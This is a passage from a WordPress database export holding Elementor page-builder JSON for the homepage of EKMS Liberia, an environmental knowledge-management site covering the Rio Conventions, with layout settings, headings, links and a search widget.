imation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(17543,2588,'_elementor_version','2.7.5'),(17544,2588,'_elementor_template_type','wp-page'),(17545,2588,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(17548,2589,'_wp_page_template','default'),(17549,2589,'_elementor_edit_mode','builder'),(17550,2589,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All 